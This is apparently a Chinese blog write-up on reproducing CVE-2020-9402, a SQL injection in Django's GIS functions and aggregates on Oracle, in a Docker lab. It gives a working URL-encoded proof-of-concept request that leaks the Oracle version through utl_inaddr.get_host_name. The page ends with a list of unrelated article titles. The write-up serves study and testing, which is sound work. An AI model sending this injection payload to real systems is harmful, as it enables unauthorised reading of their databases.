当前位置: 首页 > news >正文

Oracle SQL 注入上的 Django GIS 函数和聚合漏洞 (CVE-2020-9402)

漏洞描述

Django 于2020年3 月4日发布了一个安全更新,修复了 GIS 函数和聚合中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.0.4, 2.2.11, and 1.11.29 | Weblog | Django

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

 漏洞环境及利用

搭建docker环境

这里遇到一个问题,这个占用空间比较大卡住了,后来查看docker日志才发现

漏洞利用POC

http://139.196.87.102:8000/vuln/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1

漏洞利用如下

相关文章:

  • 【深度学习】学习率及多种选择策略
  • facebook如何群发小组贴
  • php站点伪静态配置(Apache+Linux)
  • expect脚本在自动化部署中的具体应用案例
  • 数据结构与算法(三)贪心算法(Java)
  • 激活函数与其导数:神经网络中的关键元素
  • 三菱PLC编码器转速测量功能块(梯形图和ST代码)
  • 网络安全深入学习第九课——本机信息收集
  • Mysql(基本介绍+下载安装+服务器+基本使用+建库建表+navicat/mybitas工具+外键及实例)
  • 【JavaEE初阶】线程安全问题及解决方法
  • SpringBoot + 通义千问 + 自定义React组件,支持EventStream数据解析!
  • FFmpeg零基础学习(一)——初步介绍与环境搭建
  • 中间件渗透测试-Server2131(解析+环境)
  • 【LeetCode每日一题】525. 连续数组
  • linux DNS配置
  • [nginx文档翻译系列] 控制nginx
  • [分享]iOS开发 - 实现UITableView Plain SectionView和table不停留一起滑动
  • 【407天】跃迁之路——程序员高效学习方法论探索系列(实验阶段164-2018.03.19)...
  • JS笔记四:作用域、变量(函数)提升
  • JS创建对象模式及其对象原型链探究(一):Object模式
  • JS题目及答案整理
  • js写一个简单的选项卡
  • Linux学习笔记6-使用fdisk进行磁盘管理
  • MySQL常见的两种存储引擎:MyISAM与InnoDB的爱恨情仇
  • Python打包系统简单入门
  • React中的“虫洞”——Context
  • Vue ES6 Jade Scss Webpack Gulp
  • vue2.0项目引入element-ui
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 短视频宝贝=慢?阿里巴巴工程师这样秒开短视频
  • 解析带emoji和链接的聊天系统消息
  • 聊聊redis的数据结构的应用
  • 模仿 Go Sort 排序接口实现的自定义排序
  • 深入 Nginx 之配置篇
  • 问:在指定的JSON数据中(最外层是数组)根据指定条件拿到匹配到的结果
  • 用element的upload组件实现多图片上传和压缩
  • 1.Ext JS 建立web开发工程
  • raise 与 raise ... from 的区别
  • 阿里云服务器如何修改远程端口?
  • 积累各种好的链接
  • #pragma预处理命令
  • (C语言)逆序输出字符串
  • (保姆级教程)Mysql中索引、触发器、存储过程、存储函数的概念、作用,以及如何使用索引、存储过程,代码操作演示
  • (附源码)spring boot基于Java的电影院售票与管理系统毕业设计 011449
  • (附源码)ssm旅游企业财务管理系统 毕业设计 102100
  • (论文阅读26/100)Weakly-supervised learning with convolutional neural networks
  • (译)2019年前端性能优化清单 — 下篇
  • .h头文件 .lib动态链接库文件 .dll 动态链接库
  • .java 指数平滑_转载:二次指数平滑法求预测值的Java代码
  • .net分布式压力测试工具(Beetle.DT)
  • /usr/local/nginx/logs/nginx.pid failed (2: No such file or directory)
  • @Autowired多个相同类型bean装配问题
  • [ 常用工具篇 ] AntSword 蚁剑安装及使用详解
  • []error LNK2001: unresolved external symbol _m
  • [C++ 从入门到精通] 12.重载运算符、赋值运算符重载、析构函数